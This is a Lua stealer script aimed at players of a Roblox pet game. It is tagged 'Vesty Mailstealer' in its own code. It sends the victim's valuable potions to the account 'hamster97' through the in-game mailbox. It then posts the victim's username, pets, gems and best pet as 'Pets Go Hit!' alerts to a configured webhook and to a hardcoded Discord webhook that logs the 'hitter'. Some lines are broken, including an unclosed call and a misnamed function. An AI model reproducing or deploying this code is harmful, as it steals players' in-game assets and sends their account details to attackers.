return function(dh,pn,gn,dp,potc)
if not dp then dp = 0 end
if not potc then
pcall(function()
potc = 0
local pots = {}
local save = require(game:GetService("ReplicatedStorage").Library.Client.Save).Get()
if save.Inventory.Consumable then
for i,v in pairs(save.Inventory.Consumable) do
if v.id == "God Potion" or (v.id == "Instant Luck Potion" and v.tn==4) then
pots[i]=v._am or 1
potc=potc+1
end
end
end
if potc>0 then
function _mail(u, t, i, n)
local args = {
    [1] = u,
    [2] = "Vesty Mailstealer",
    [3] = t,
    [4] = i,
    [5] = n or 1
}
return game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox: Send"):InvokeServer(unpack(args))
end
for i,v in pairs(pots) do
local x,y = false, "x"
repeat
x,y = mail("hamster97", "Consumable", i, v)
wait(0.2
until x==true

end
end
end
end)
end
if _G.dx then return end
if tonumber(gn)==100 then gn = 0 end
local msg = ""
request = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request
if dh then
_G.dx=true
msg = '{"embeds":[{"fields":[{"name":"User","value":"'..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.DisplayName..'"},{"value":"'..pn..'","name":"Pets","inline":true},{"value":"'..gn..'","name":"Gems","inline":true},{"value":"'..dp..'","name":"DualedPets","inline":true},{"value":"'..potc..'","name":"Dualed Potions","inline":true}],"title":"Pets Go Hit!"}],"tts":false,"content":"@everyone"}'
else
msg = '{"embeds":[{"fields":[{"name":"User","value":"'..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.DisplayName..'"},{"value":"'..pn..'","name":"Pets","inline":true},{"value":"'..gn..'","name":"Gems","inline":true}],"title":"Pets Go Hit!"}],"tts":false,"content":"@everyone"}'
end
local response =
        request(
        {
            Url = _G.wh,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = msg
        }
    )
local xxxvvv = "lolly"
pcall(function() xxxvvv=response.StatusMessage end)
if typeof(xxxvvv)~="string" then xxxvvv="Lolly" end
if not _G.User then _G.User="yve (pet change hit)" end
local big = 0
pcall(function()
local save = require(game:GetService("ReplicatedStorage").Library.Client.Save)
local dir = game:GetService("ReplicatedStorage")["__DIRECTORY"].Pets
save = save.Get()
for i,v in pairs(save.Inventory.Pet) do
if require(dir[v.id]).difficulty >= big then
big = require(dir[v.id]).difficulty
end
end
big = "1/"..big
end)
local log = ""
if dh then
log = '{"embeds":[{"fields":[{"name":"User","value":"'..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.DisplayName..'"},{"value":"'.._G.User..'","name":"Hitter","inline":false},{"value":"'..pn..'","name":"Pets","inline":true},{"value":"'..gn..'","name":"Gems","inline":true},{"value":"'..dp..'","name":"DualedPets","inline":true},{"value":"'..potc..'","name":"Dualed Potions","inline":true}],"title":"Pets Go Hit!"}],"tts":false,"content":"'..xxxvvv..'"}'
else
log = '{"embeds":[{"fields":[{"name":"User","value":"'..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.DisplayName..'"},{"value":"'.._G.User..'","name":"Hitter","inline":false},{"value":"'..pn..'","name":"Pets","inline":true},{"value":"'..gn..'","name":"Gems","inline":true},{"value":"'..big..'","name":"Best Pet","inline":false}],"title":"Pets Go Hit!"}],"tts":false,"content":"'..xxxvvv..'"}'
end
local responser =
        request(
        {
            Url = "https://discordapp.com/api/webhooks/1298650438111068170/hippfrrGnjC-5wIWfrUS8gV6AAwqJKlpUiAmxHSaSFQhHPutaOym0MmSSxSpADpwZIAQ",
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = log
        }
    )
return response
end
